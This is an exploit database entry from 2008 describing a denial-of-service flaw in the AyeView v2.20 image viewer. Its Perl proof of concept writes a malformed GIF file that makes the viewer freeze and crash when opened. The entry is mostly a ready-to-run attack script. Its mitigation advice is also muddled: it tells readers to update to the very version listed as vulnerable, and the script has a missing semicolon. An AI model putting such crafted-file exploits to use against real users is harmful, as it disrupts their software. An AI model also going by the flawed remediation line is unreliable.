AyeView v2.20 (malformed gif image) DoS Exploit

vendor:

AyeView

by:

suN8Hclf (DaRk-CodeRs Group), crimson.loyd@gmail.com

7.8

CVSS

HIGH

Denial of Service

400

CWE

Product Name: AyeView

Affected Version From: AyeView v2.20

Affected Version To: AyeView v2.20

Patch Exists: YES

Related CWE: N/A

CPE: a:ayeview:ayeview:2.20

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP2 & Windows 2000 SP4

2008

AyeView v2.20 (malformed gif image) DoS Exploit

AyeView v2.20 is vulnerable to a denial of service attack when a specially crafted GIF image is opened. When the image is opened, AyeView freezes and after few seconds crashes. This vulnerability has been tested on Windows XP SP2 & Windows 2000 SP4.

Mitigation:

Update to the latest version of AyeView v2.20 or later.

Source

Exploit-DB raw data:

Name      : AyeView v2.20 (malformed gif image) DoS Exploit
Credit    : suN8Hclf (DaRk-CodeRs Group), crimson.loyd@gmail.com
Download: : http://www.ayeview.com/downloads.htm
Greetz    : Luigi Auriemma, 0in, cOndemned, e.wiZz!, Gynvael Coldwind, 
            Katharsis, all from #dark-coders and others;]

PoC:



#!/usr/local/bin/perl   
# Open file (File->Open) or simply click on the image miniature
# AyeView freezes and after few seconds crashes...
# Tested on Windows XP SP2 & Windows 2000 SP4

my $code="\x47\x49\x46\x38\x39\x61\xff\xff\xff\xff\x0e".
         "\x00\x00\x2c\x00\x00\x00\x00\xff\xff\xff\xff\x00";
my $file="open_me.gif";

open(my $FILE, ">>$file") or die "[!]Cannot open file";
print $FILE $code;
close($FILE);
print "$file has been generated\n"
print "Credit: suN8Hclf, www.dark-coders.pl"

# milw0rm.com [2008-10-04]